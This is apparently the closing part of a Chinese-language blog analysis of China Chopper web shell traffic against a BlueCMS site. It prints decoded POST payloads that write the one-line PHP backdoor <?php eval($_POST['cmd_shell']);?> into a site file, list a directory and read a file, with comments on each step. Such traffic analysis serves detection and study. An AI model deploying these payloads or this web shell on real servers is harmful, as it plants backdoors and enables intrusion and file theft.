z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$f=base64_decode($_POST["z1"]);$c=$_POST["z2"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\data\\foot.php
z2=<?php eval($_POST['cmd_shell']);?>
// 将 <?php eval($_POST['cmd_shell']);?> 写入 C:\\phpstudy\\WWW\\bluecms\\data\\foot.php

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXA==
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\data\\
// 获取目标服务器 C:\\phpstudy\\WWW\\bluecms\\data\\ 目录的所有文件

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw==&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXGZvb3QucGhw
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\data\\foot.php
// 获取 C:\\phpstudy\\WWW\\bluecms\\data\\foot.php 文件内容
->|<?php eval($_POST['cmd_shell']);?>|<

也可以根据菜刀用于分隔自己的命令和程序本身输出的 HTML 的分隔符 , 例如 : ->|

到这里基本上也就分析差不多了

推荐阅读更多精彩内容